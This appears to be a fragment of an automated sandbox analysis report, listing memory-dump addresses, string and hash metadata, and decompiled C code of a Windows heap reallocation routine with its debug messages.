                                                                                                                                                    0x00d10d06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d08
                                                                                                                                                    0x00d10d0e
                                                                                                                                                    0x00d10d10
                                                                                                                                                    0x00d10d2e
                                                                                                                                                    0x00d10d2e
                                                                                                                                                    0x00d10d34
                                                                                                                                                    0x00d10d36
                                                                                                                                                    0x00d10d60
                                                                                                                                                    0x00d10d6f
                                                                                                                                                    0x00d10d72
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d72
                                                                                                                                                    0x00d10d38
                                                                                                                                                    0x00d10d41
                                                                                                                                                    0x00d10d42
                                                                                                                                                    0x00d10d44
                                                                                                                                                    0x00d10d47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d49
                                                                                                                                                    0x00d10d4c
                                                                                                                                                    0x00d10d4c
                                                                                                                                                    0x00d10d4f
                                                                                                                                                    0x00d10d52
                                                                                                                                                    0x00d10d55
                                                                                                                                                    0x00d10d58
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d5a
                                                                                                                                                    0x00d10d5b
                                                                                                                                                    0x00d10d5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d5e
                                                                                                                                                    0x00d10ddb
                                                                                                                                                    0x00d10dde
                                                                                                                                                    0x00d10de1
                                                                                                                                                    0x00d10e03
                                                                                                                                                    0x00d10e08
                                                                                                                                                    0x00d10de3
                                                                                                                                                    0x00d10dfb
                                                                                                                                                    0x00d10e00
                                                                                                                                                    0x00d10e11
                                                                                                                                                    0x00d10e14
                                                                                                                                                    0x00d10e15
                                                                                                                                                    0x00d10e17
                                                                                                                                                    0x00d10e17
                                                                                                                                                    0x00d10e1a
                                                                                                                                                    0x00d10e1d
                                                                                                                                                    0x00d10e24
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10e29
                                                                                                                                                    0x00d10d14
                                                                                                                                                    0x00d10d14
                                                                                                                                                    0x00d10d15
                                                                                                                                                    0x00d10d15
                                                                                                                                                    0x00d10d18
                                                                                                                                                    0x00d10d1b
                                                                                                                                                    0x00d10d1e
                                                                                                                                                    0x00d10d21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d23
                                                                                                                                                    0x00d10d24
                                                                                                                                                    0x00d10d29
                                                                                                                                                    0x00d10d2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d2c
                                                                                                                                                    0x00d10d86
                                                                                                                                                    0x00d10d89
                                                                                                                                                    0x00d10d8c
                                                                                                                                                    0x00d10dae
                                                                                                                                                    0x00d10db3
                                                                                                                                                    0x00d10d8e
                                                                                                                                                    0x00d10da6
                                                                                                                                                    0x00d10dab
                                                                                                                                                    0x00d10dbf
                                                                                                                                                    0x00d10dc2
                                                                                                                                                    0x00d10dcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10dd0
                                                                                                                                                    0x00d10cbe
                                                                                                                                                    0x00d10cc1
                                                                                                                                                    0x00d10cc5
                                                                                                                                                    0x00d10ce7
                                                                                                                                                    0x00d10cec
                                                                                                                                                    0x00d10cc7
                                                                                                                                                    0x00d10cdf
                                                                                                                                                    0x00d10ce4
                                                                                                                                                    0x00d10cf2
                                                                                                                                                    0x00d10cf5
                                                                                                                                                    0x00d10cf8
                                                                                                                                                    0x00d10ca3
                                                                                                                                                    0x00d10ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10ca8
                                                                                                                                                    0x00d10c6d
                                                                                                                                                    0x00d10c8f
                                                                                                                                                    0x00d10c94
                                                                                                                                                    0x00d10c6f
                                                                                                                                                    0x00d10c87
                                                                                                                                                    0x00d10c8c
                                                                                                                                                    0x00d10c9a
                                                                                                                                                    0x00d10c9b
                                                                                                                                                    0x00d10c9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d77
                                                                                                                                                    0x00d10d77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10d77

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                                                                    • API String ID: 0-3316276410
                                                                                                                                                    • Opcode ID: cf6af2fff3a861beda7429727ab83992229a42769b109220a573ffc7baa88a34
                                                                                                                                                    • Instruction ID: 66173cc3075399dcbf9314ab17d4436ff42dd29c771c3e51093b5148a9461982
                                                                                                                                                    • Opcode Fuzzy Hash: cf6af2fff3a861beda7429727ab83992229a42769b109220a573ffc7baa88a34
                                                                                                                                                    • Instruction Fuzzy Hash: 86F1CF71600245BFCB20EF68D480BE6BBF5FF05714F588155E8859B682CBB0E9C5DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E00D11238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                    				signed int _t123;
                                                                                                                                                    				signed int _t124;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    				intOrPtr _t132;
                                                                                                                                                    				signed int _t145;
                                                                                                                                                    				signed int _t146;
                                                                                                                                                    				signed int _t147;
                                                                                                                                                    				intOrPtr _t151;
                                                                                                                                                    				intOrPtr _t163;
                                                                                                                                                    				signed int _t173;
                                                                                                                                                    				signed int _t174;
                                                                                                                                                    				signed int _t178;
                                                                                                                                                    				short _t184;
                                                                                                                                                    				signed int _t193;
                                                                                                                                                    				signed int _t194;
                                                                                                                                                    				intOrPtr _t197;
                                                                                                                                                    				intOrPtr _t219;
                                                                                                                                                    				short* _t233;
                                                                                                                                                    				void* _t246;
                                                                                                                                                    				intOrPtr _t248;
                                                                                                                                                    				signed int _t251;
                                                                                                                                                    				signed int _t253;
                                                                                                                                                    				signed int _t254;
                                                                                                                                                    				void* _t255;
                                                                                                                                                    				void* _t256;
                                                                                                                                                    
                                                                                                                                                    				_t246 = __edx;
                                                                                                                                                    				_push(0x18);
                                                                                                                                                    				_push(0xc6d158);
                                                                                                                                                    				_t123 = L00C6DF5C(__ebx, __edi, __esi);
                                                                                                                                                    				_t248 =  *((intOrPtr*)(_t255 + 8));
                                                                                                                                                    				 *((intOrPtr*)(_t255 + 8)) = _t248;
                                                                                                                                                    				 *((char*)(_t255 - 0x19)) = 0;
                                                                                                                                                    				 *(_t255 - 0x24) = 0;
                                                                                                                                                    				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
                                                                                                                                                    					 *(_t255 - 4) = 0;
                                                                                                                                                    					 *(_t255 - 4) = 1;
                                                                                                                                                    					_t232 = "RtlReAllocateHeap";
                                                                                                                                                    					_t124 = E00C785CA(_t248, "RtlReAllocateHeap");
                                                                                                                                                    					__eflags = _t124;
                                                                                                                                                    					if(_t124 != 0) {
                                                                                                                                                    						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
                                                                                                                                                    						_t251 =  *(_t255 + 0x14);
                                                                                                                                                    						__eflags = _t251;
                                                                                                                                                    						if(_t251 == 0) {
                                                                                                                                                    							_t235 = 1;
                                                                                                                                                    							__eflags = 1;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t235 = _t251;
                                                                                                                                                    						}
                                                                                                                                                    						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
                                                                                                                                                    						__eflags = _t130 - _t251;
                                                                                                                                                    						if(_t130 < _t251) {
                                                                                                                                                    							L66:
                                                                                                                                                    							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t132 + 0xc);
                                                                                                                                                    							if( *(_t132 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E00CB373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							_push( *((intOrPtr*)(_t248 + 0x7c)));
                                                                                                                                                    							E00CB373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
                                                                                                                                                    							E00D106F9(0);
                                                                                                                                                    							_t117 = _t255 - 0x24;
                                                                                                                                                    							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
                                                                                                                                                    							__eflags =  *_t117;
                                                                                                                                                    							goto L71;
                                                                                                                                                    						} else {
                                                                                                                                                    							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
                                                                                                                                                    							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
                                                                                                                                                    								goto L66;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *(_t255 + 0xc) & 0x00000001;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								E00C622D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
                                                                                                                                                    								 *((char*)(_t255 - 0x19)) = 1;
                                                                                                                                                    								_t26 = _t255 + 0xc;
                                                                                                                                                    								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
                                                                                                                                                    								__eflags =  *_t26;
                                                                                                                                                    							}
                                                                                                                                                    							E00D1098E(_t235, _t246, _t248, 0);
                                                                                                                                                    							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
                                                                                                                                                    							__eflags =  *((char*)(_t253 + 7)) - 5;
                                                                                                                                                    							if( *((char*)(_t253 + 7)) == 5) {
                                                                                                                                                    								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
                                                                                                                                                    								__eflags = _t253;
                                                                                                                                                    							}
                                                                                                                                                    							_t145 = L00CA0ED7(_t235, _t248, _t253, _t232);
                                                                                                                                                    							__eflags = _t145;
                                                                                                                                                    							if(_t145 == 0) {
                                                                                                                                                    								L52:
                                                                                                                                                    								_t146 =  *(_t255 - 0x24);
                                                                                                                                                    								__eflags = _t146;
                                                                                                                                                    								if(_t146 == 0) {
                                                                                                                                                    									L71:
                                                                                                                                                    									_t119 = _t255 - 4;
                                                                                                                                                    									 *_t119 =  *(_t255 - 4) & 0x00000000;
                                                                                                                                                    									__eflags =  *_t119;
                                                                                                                                                    									 *(_t255 - 4) = 0xfffffffe;
                                                                                                                                                    									E00D116C3();
                                                                                                                                                    									_t123 =  *(_t255 - 0x24);
                                                                                                                                                    									goto L72;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t146 -  *0xd47928; // 0x0
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									_t147 = E00C78131();
                                                                                                                                                    									__eflags = _t147 & 0x00000800;
                                                                                                                                                    									if((_t147 & 0x00000800) == 0) {
                                                                                                                                                    										goto L71;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *(_t255 - 0x20) -  *0xd4792c; // 0x0
                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                    										goto L71;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xd4792e; // 0x0
                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                    										goto L71;
                                                                                                                                                    									}
                                                                                                                                                    									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    									__eflags =  *(_t151 + 0xc);
                                                                                                                                                    									if( *(_t151 + 0xc) == 0) {
                                                                                                                                                    										_push("HEAP: ");
                                                                                                                                                    										E00CB373B();
                                                                                                                                                    									} else {
                                                                                                                                                    										E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    									}
                                                                                                                                                    									_push(E00CFF719(_t248,  *(_t255 - 0x20)));
                                                                                                                                                    									_push( *(_t255 + 0x14));
                                                                                                                                                    									E00CB373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
                                                                                                                                                    									L58:
                                                                                                                                                    									E00D106F9(0);
                                                                                                                                                    									goto L71;
                                                                                                                                                    								}
                                                                                                                                                    								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    								__eflags =  *(_t163 + 0xc);
                                                                                                                                                    								if( *(_t163 + 0xc) == 0) {
                                                                                                                                                    									_push("HEAP: ");
                                                                                                                                                    									E00CB373B();
                                                                                                                                                    								} else {
                                                                                                                                                    									E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    								}
                                                                                                                                                    								_push( *(_t255 + 0x14));
                                                                                                                                                    								E00CB373B("Just reallocated block at %p to %x bytes\n",  *0xd47928);
                                                                                                                                                    								goto L58;
                                                                                                                                                    							} else {
                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xd47928; // 0x0
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									_t173 = E00C78131();
                                                                                                                                                    									__eflags = _t173 & 0x00000800;
                                                                                                                                                    									if((_t173 & 0x00000800) == 0) {
                                                                                                                                                    										L37:
                                                                                                                                                    										_t174 = E00C7C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
                                                                                                                                                    										 *(_t255 - 0x24) = _t174;
                                                                                                                                                    										__eflags = _t174;
                                                                                                                                                    										if(_t174 != 0) {
                                                                                                                                                    											_t70 = _t174 - 8; // -8
                                                                                                                                                    											_t254 = _t70;
                                                                                                                                                    											__eflags =  *((char*)(_t254 + 7)) - 5;
                                                                                                                                                    											if( *((char*)(_t254 + 7)) == 5) {
                                                                                                                                                    												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
                                                                                                                                                    												__eflags = _t254;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags =  *(_t248 + 0x4c);
                                                                                                                                                    											if( *(_t248 + 0x4c) != 0) {
                                                                                                                                                    												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                                                                                                                                    												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
                                                                                                                                                    												if(__eflags != 0) {
                                                                                                                                                    													_push(0);
                                                                                                                                                    													_push(_t254);
                                                                                                                                                    													_push(_t248);
                                                                                                                                                    													E00D0F8EE(_t232, _t248, _t254, __eflags);
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    											__eflags =  *(_t254 + 2) & 0x00000002;
                                                                                                                                                    											if(( *(_t254 + 2) & 0x00000002) == 0) {
                                                                                                                                                    												_t178 =  *(_t254 + 3) & 0xff;
                                                                                                                                                    											} else {
                                                                                                                                                    												_t233 = E00C92568(_t254);
                                                                                                                                                    												__eflags =  *(_t248 + 0x40) & 0x08000000;
                                                                                                                                                    												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
                                                                                                                                                    													_t184 = 0;
                                                                                                                                                    													__eflags = 0;
                                                                                                                                                    												} else {
                                                                                                                                                    													_t184 = L00D09AF6();
                                                                                                                                                    												}
                                                                                                                                                    												 *_t233 = _t184;
                                                                                                                                                    												_t178 =  *(_t233 + 2) & 0x0000ffff;
                                                                                                                                                    											}
                                                                                                                                                    											 *(_t255 - 0x20) = _t178;
                                                                                                                                                    											__eflags =  *(_t248 + 0x4c);
                                                                                                                                                    											if( *(_t248 + 0x4c) != 0) {
                                                                                                                                                    												_t235 =  *(_t254 + 2) & 0x000000ff;
                                                                                                                                                    												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
                                                                                                                                                    												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                                                                                                                                    												__eflags =  *_t254;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										L00D0FB7A(_t235, _t246, _t248, 1);
                                                                                                                                                    										E00D1098E(_t235, _t246, _t248, 0);
                                                                                                                                                    										goto L52;
                                                                                                                                                    									}
                                                                                                                                                    									_t232 = 0;
                                                                                                                                                    									__eflags =  *0xd4792c - _t232; // 0x0
                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                    										goto L37;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *(_t248 + 0x4c);
                                                                                                                                                    									if( *(_t248 + 0x4c) != 0) {
                                                                                                                                                    										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                                                                                                                                    										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                    											_push(0);
                                                                                                                                                    											_push(_t253);
                                                                                                                                                    											_push(_t248);
                                                                                                                                                    											E00D0F8EE(0, _t248, _t253, __eflags);
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *(_t253 + 2) & 0x00000002;
                                                                                                                                                    									if(( *(_t253 + 2) & 0x00000002) == 0) {
                                                                                                                                                    										_t193 =  *(_t253 + 3) & 0xff;
                                                                                                                                                    									} else {
                                                                                                                                                    										_t193 =  *(E00C92568(_t253) + 2) & 0x0000ffff;
                                                                                                                                                    									}
                                                                                                                                                    									 *(_t255 - 0x20) = _t193;
                                                                                                                                                    									__eflags =  *(_t248 + 0x4c) - _t232;
                                                                                                                                                    									if( *(_t248 + 0x4c) != _t232) {
                                                                                                                                                    										_t235 =  *(_t253 + 2) & 0x000000ff;
                                                                                                                                                    										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
                                                                                                                                                    										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                                                                                                                                    										__eflags =  *_t253;
                                                                                                                                                    									}
                                                                                                                                                    									_t194 =  *(_t255 - 0x20);
                                                                                                                                                    									__eflags = _t194 - _t232;
                                                                                                                                                    									if(_t194 != _t232) {
                                                                                                                                                    										__eflags = _t194 -  *0xd4792c; // 0x0
                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                    											goto L37;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xd4792e; // 0x0
                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                    											goto L37;
                                                                                                                                                    										}
                                                                                                                                                    										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
                                                                                                                                                    										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
                                                                                                                                                    											_push("HEAP: ");
                                                                                                                                                    											E00CB373B();
                                                                                                                                                    										} else {
                                                                                                                                                    											E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    										}
                                                                                                                                                    										_pop(_t235);
                                                                                                                                                    										_push(E00CFF719(_t248,  *(_t255 - 0x20)));
                                                                                                                                                    										_push( *(_t255 + 0x14));
                                                                                                                                                    										E00CB373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
                                                                                                                                                    										_t256 = _t256 + 0x10;
                                                                                                                                                    										_push(_t232);
                                                                                                                                                    										L36:
                                                                                                                                                    										E00D106F9();
                                                                                                                                                    									}
                                                                                                                                                    									goto L37;
                                                                                                                                                    								}
                                                                                                                                                    								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    								__eflags =  *(_t219 + 0xc);
                                                                                                                                                    								if( *(_t219 + 0xc) == 0) {
                                                                                                                                                    									_push("HEAP: ");
                                                                                                                                                    									E00CB373B();
                                                                                                                                                    								} else {
                                                                                                                                                    									E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    								}
                                                                                                                                                    								_pop(_t235);
                                                                                                                                                    								_push( *(_t255 + 0x14));
                                                                                                                                                    								E00CB373B("About to reallocate block at %p to %x bytes\n",  *0xd47928);
                                                                                                                                                    								_t256 = _t256 + 0xc;
                                                                                                                                                    								_push(0);
                                                                                                                                                    								goto L36;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					 *(_t255 - 0x24) = 0;
                                                                                                                                                    					goto L71;
                                                                                                                                                    				} else {
                                                                                                                                                    					_push( *(_t255 + 0x14));
                                                                                                                                                    					_push( *((intOrPtr*)(_t255 + 0x10)));
                                                                                                                                                    					_push( *(_t255 + 0xc));
                                                                                                                                                    					_push(_t248);
                                                                                                                                                    					E00D0E765();
                                                                                                                                                    					L72:
                                                                                                                                                    					return L00C6DFA1(_t123);
                                                                                                                                                    				}
                                                                                                                                                    			}




























                                                                                                                                                    0x00d11558
                                                                                                                                                    0x00d1155d
                                                                                                                                                    0x00d11538
                                                                                                                                                    0x00d11550
                                                                                                                                                    0x00d11555
                                                                                                                                                    0x00d11563
                                                                                                                                                    0x00d11571
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11313
                                                                                                                                                    0x00d11316
                                                                                                                                                    0x00d1131c
                                                                                                                                                    0x00d11375
                                                                                                                                                    0x00d1137a
                                                                                                                                                    0x00d1137f
                                                                                                                                                    0x00d11468
                                                                                                                                                    0x00d11472
                                                                                                                                                    0x00d11477
                                                                                                                                                    0x00d1147a
                                                                                                                                                    0x00d1147c
                                                                                                                                                    0x00d11482
                                                                                                                                                    0x00d11482
                                                                                                                                                    0x00d11485
                                                                                                                                                    0x00d11489
                                                                                                                                                    0x00d11492
                                                                                                                                                    0x00d11492
                                                                                                                                                    0x00d11492
                                                                                                                                                    0x00d11494
                                                                                                                                                    0x00d11498
                                                                                                                                                    0x00d1149d
                                                                                                                                                    0x00d114a7
                                                                                                                                                    0x00d114aa
                                                                                                                                                    0x00d114ac
                                                                                                                                                    0x00d114ae
                                                                                                                                                    0x00d114af
                                                                                                                                                    0x00d114b0
                                                                                                                                                    0x00d114b0
                                                                                                                                                    0x00d114aa
                                                                                                                                                    0x00d114b5
                                                                                                                                                    0x00d114b9
                                                                                                                                                    0x00d114e3
                                                                                                                                                    0x00d114bb
                                                                                                                                                    0x00d114c1
                                                                                                                                                    0x00d114c3
                                                                                                                                                    0x00d114ca
                                                                                                                                                    0x00d114d3
                                                                                                                                                    0x00d114d3
                                                                                                                                                    0x00d114cc
                                                                                                                                                    0x00d114cc
                                                                                                                                                    0x00d114cc
                                                                                                                                                    0x00d114d5
                                                                                                                                                    0x00d114d8
                                                                                                                                                    0x00d114d8
                                                                                                                                                    0x00d114e6
                                                                                                                                                    0x00d114e9
                                                                                                                                                    0x00d114ed
                                                                                                                                                    0x00d114f8
                                                                                                                                                    0x00d114fe
                                                                                                                                                    0x00d11504
                                                                                                                                                    0x00d11504
                                                                                                                                                    0x00d11504
                                                                                                                                                    0x00d114ed
                                                                                                                                                    0x00d11509
                                                                                                                                                    0x00d11511
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11511
                                                                                                                                                    0x00d11385
                                                                                                                                                    0x00d11387
                                                                                                                                                    0x00d1138d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11393
                                                                                                                                                    0x00d11396
                                                                                                                                                    0x00d1139b
                                                                                                                                                    0x00d113a5
                                                                                                                                                    0x00d113a8
                                                                                                                                                    0x00d113aa
                                                                                                                                                    0x00d113ab
                                                                                                                                                    0x00d113ac
                                                                                                                                                    0x00d113ad
                                                                                                                                                    0x00d113ad
                                                                                                                                                    0x00d113a8
                                                                                                                                                    0x00d113b2
                                                                                                                                                    0x00d113b6
                                                                                                                                                    0x00d113c9
                                                                                                                                                    0x00d113b8
                                                                                                                                                    0x00d113be
                                                                                                                                                    0x00d113be
                                                                                                                                                    0x00d113cc
                                                                                                                                                    0x00d113cf
                                                                                                                                                    0x00d113d2
                                                                                                                                                    0x00d113dd
                                                                                                                                                    0x00d113e3
                                                                                                                                                    0x00d113e9
                                                                                                                                                    0x00d113e9
                                                                                                                                                    0x00d113e9
                                                                                                                                                    0x00d113eb
                                                                                                                                                    0x00d113ee
                                                                                                                                                    0x00d113f1
                                                                                                                                                    0x00d113f3
                                                                                                                                                    0x00d113fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11403
                                                                                                                                                    0x00d1140a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d11412
                                                                                                                                                    0x00d11415
                                                                                                                                                    0x00d11418
                                                                                                                                                    0x00d1143a
                                                                                                                                                    0x00d1143f
                                                                                                                                                    0x00d1141a
                                                                                                                                                    0x00d11432
                                                                                                                                                    0x00d11437
                                                                                                                                                    0x00d11444
                                                                                                                                                    0x00d1144e
                                                                                                                                                    0x00d1144f
                                                                                                                                                    0x00d1145a
                                                                                                                                                    0x00d1145f
                                                                                                                                                    0x00d11462
                                                                                                                                                    0x00d11463
                                                                                                                                                    0x00d11463
                                                                                                                                                    0x00d11463
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d113f1
                                                                                                                                                    0x00d11324
                                                                                                                                                    0x00d11327
                                                                                                                                                    0x00d1132b
                                                                                                                                                    0x00d1134d
                                                                                                                                                    0x00d11352
                                                                                                                                                    0x00d1132d
                                                                                                                                                    0x00d11345
                                                                                                                                                    0x00d1134a
                                                                                                                                                    0x00d11357
                                                                                                                                                    0x00d11358
                                                                                                                                                    0x00d11366
                                                                                                                                                    0x00d1136b
                                                                                                                                                    0x00d1136e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d1136e
                                                                                                                                                    0x00d1130d
                                                                                                                                                    0x00d112be
                                                                                                                                                    0x00d1128a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d1125c
                                                                                                                                                    0x00d1125c
                                                                                                                                                    0x00d1125f
                                                                                                                                                    0x00d11262
                                                                                                                                                    0x00d11265
                                                                                                                                                    0x00d11266
                                                                                                                                                    0x00d116b6
                                                                                                                                                    0x00d116bb
                                                                                                                                                    0x00d116bb

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                    • API String ID: 0-3744532478
                                                                                                                                                    • Opcode ID: fdc26c928810dc17ec4e111e383c14cdf5a47e32ef2a1b94917efccc43655c26
                                                                                                                                                    • Instruction ID: 504c0b6e226d22fa11699f91b0b416179312aad22e3cb2c5bd7006f5e1aae973
                                                                                                                                                    • Opcode Fuzzy Hash: fdc26c928810dc17ec4e111e383c14cdf5a47e32ef2a1b94917efccc43655c26
                                                                                                                                                    • Instruction Fuzzy Hash: DEC1E178504281AFDB21EF64D885BEAB7F0EF09710F088058F5959A692CB74E8C5EB71
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
